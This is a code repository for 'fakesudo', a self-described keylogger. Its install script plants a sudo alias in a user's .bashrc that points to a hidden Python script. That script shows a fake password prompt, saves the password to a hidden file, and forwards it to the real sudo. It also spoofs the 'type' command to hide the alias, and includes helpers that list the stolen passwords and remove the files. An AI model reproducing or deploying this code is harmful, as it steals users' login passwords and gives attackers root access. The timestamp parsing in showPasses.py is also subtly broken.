├── README.md ├── TODO ├── fake.py ├── install.py ├── removeMe.py ├── showPasses.py └── sud.sh /README.md: -------------------------------------------------------------------------------- 1 | # fakesudo - sudo almost as fake as your ma 2 | 3 | This is a very simple and primitive keylogger that injects an alias of ``sudo`` into ``.bashrc``. 4 | -------------------------------------------------------------------------------- /TODO: -------------------------------------------------------------------------------- 1 | 1) Repair time check! 2 | 2) gksu 3 | 4 | -------------------------------------------------------------------------------- /fake.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/python 2 | # -*- coding: UTF-8 -*- 3 | from getpass import * 4 | import time 5 | import os 6 | import sys 7 | 8 | 9 | catchFile = "--catched--" 10 | 11 | def fakeSudo(): 12 | def savePass(passwd): 13 | try: 14 | file = open(catchFile, 'a') 15 | except: 16 | file = open(catchFile, 'w') 17 | 18 | catch = "%s|%s|%s\n" % (getuser(), passwd, str(time.ctime())) 19 | file.write(catch) 20 | file.close() 21 | 22 | # Catch pass: 23 | try: 24 | passwd = getpass("[fakesudo] password for %s: " % getuser()) 25 | except KeyboardInterrupt: 26 | passwd = getpass("Password: ") 27 | 28 | # Save pass: 29 | savePass(passwd) 30 | 31 | # Do the command: 32 | # change this to some python pipeline or what! 33 | sudocmd = 'echo "%s" | sudo -s %s' % (passwd, " ".join(sys.argv[2:])) 34 | 35 | os.system(sudocmd) 36 | 37 | 38 | def fakeType(): 39 | def typeType(): 40 | print "type is a shell builtin" 41 | 42 | def typeSudo(): 43 | print "sudo is /usr/bin/sudo" 44 | 45 | try: 46 | args = sys.argv[2:] 47 | if args: 48 | for arg in args: 49 | if arg == "type": 50 | typeType() 51 | elif arg == "sudo": 52 | typeSudo() 53 | else: 54 | os.system("type %s" % arg) 55 | except: 56 | pass 57 | 58 | 59 | try: 60 | mode = sys.argv[1] 61 | except: 62 | print "You must specify what to do!" 63 | exit() 64 | 65 | 66 | if mode == "sudo": 67 | fakeSudo() 68 | 69 | if mode == "type": 70 | fakeType() 71 | 72 | 73 | -------------------------------------------------------------------------------- /install.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/python 2 | # -*- coding: UTF-8 -*- 3 | import os 4 | from random import choice 5 | from string import letters 6 | 7 | 8 | 9 | 10 | def generateRandomText(lng, begining = ""): 11 | text = begining 12 | 13 | for x in range(lng): 14 | text += choice(letters) 15 | return text 16 | 17 | 18 | 19 | home = os.getenv("HOME") 20 | 21 | fakeSudoFilename = generateRandomText(6, ".") # filename for fakesudo.py 22 | 23 | sudoLoc = home + "/" + fakeSudoFilename # location for previous 24 | 25 | fakeLogFilename = generateRandomText(6, ".") # filename for logfile - file with passwords 26 | logLoc = home + "/" + fakeLogFilename 27 | 28 | 29 | 30 | 31 | ### inject alias code into bashrc from sud.sh 32 | with open("sud.sh", "r") as file: 33 | data = file.read() 34 | 35 | rdata = data.replace("--fake--", sudoLoc) 36 | 37 | with open( home + "/.bashrc", "a") as file: 38 | file.write(rdata) 39 | 40 | 41 | 42 | ### Copy fakesudo.py to home dir: 43 | 44 | 45 | with open("fake.py", "r") as file: 46 | data = file.read() 47 | 48 | rdata = data.replace("--catched--", logLoc) 49 | 50 | with open(sudoLoc, "w") as file: 51 | file.write(rdata) 52 | 53 | 54 | 55 | 56 | with open("logNames", "a") as ffile: 57 | logLine = "%s|%s|%s" % (fakeSudoFilename, fakeLogFilename, home) 58 | ffile.write(logLine + "\n") 59 | 60 | 61 | print("Script was written to %s password will be stored at %s" % (fakeSudoFilename, fakeLogFilename)) 62 | 63 | 64 | 65 | 66 | 67 | -------------------------------------------------------------------------------- /removeMe.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/python 2 | # -*- coding: UTF-8 -*- 3 | 4 | import os 5 | 6 | def deleteFile(path): 7 | print "Trying to delete file: ", path, 8 | try: 9 | os.remove(path) 10 | print " ok!" 11 | except: 12 | print "Fail!" 13 | 14 | 15 | with open("logNames", "r") as file: 16 | raw = file.read() 17 | 18 | for line in raw.splitlines(): 19 | lineParsed = line.split("|") 20 | home = lineParsed[2] + "/" 21 | sudoLoc = home + lineParsed[0] # location of fakesudo 22 | logLoc = home + lineParsed[1] # location of logfile 23 | 24 | deleteFile(sudoLoc) 25 | deleteFile(logLoc) 26 | 27 | print "Please, clean your bashrc at your own." 28 | -------------------------------------------------------------------------------- /showPasses.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/python 2 | # -*- coding: UTF-8 -*- 3 | import time 4 | 5 | with open("logNames", "r") as file: 6 | raw = file.read() 7 | 8 | for line in raw.splitlines(): 9 | lineParsed = line.split("|") 10 | home = lineParsed[2] + "/" 11 | sudoLoc = home + lineParsed[0] # location of fakesudo 12 | logLoc = home + lineParsed[1] # location of logfile 13 | try: 14 | with open(logLoc, "r") as file: 15 | data = file.read() 16 | for passwd in data.splitlines(): 17 | info = passwd.split("|") 18 | opened = time.ctime(float(info[2])) 19 | print "User: %s, pass:'%s', at: %s" % (info[0], info[1], opened) 20 | except: 21 | pass 22 | -------------------------------------------------------------------------------- /sud.sh: -------------------------------------------------------------------------------- 1 | Type () { 2 | python --fake-- type $*; 3 | } 4 | 5 | alias type="Type" 6 | 7 | alias sudo="python --fake-- sudo " 8 | --------------------------------------------------------------------------------